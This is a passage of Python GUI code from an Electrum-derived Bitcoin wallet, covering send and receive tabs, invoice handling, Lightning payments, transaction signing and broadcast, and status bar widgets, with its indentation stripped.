hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin Global address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Global Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key):
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
grid.addWidget(QLabel(lnaddr.paymenthash.hex()), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit()
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if not self.network.is_lightning_running():
return
cur, total = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_percent = 0
progress_str = "??%"
if cur is not None and total is not None and total > 0:
# note: Progress is rescaled such that 95% is considered "done".
# "Real" progress can stay around 98-99% for a long time, which
# might needlessly worry users.
progress_percent = (1.0 / 0.95 * cur / total) * 100
progress_percent = min(progress_percent, 100)
progress_percent = round(progress_percent)
progress_str = f"{progress_percent}%"
if progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
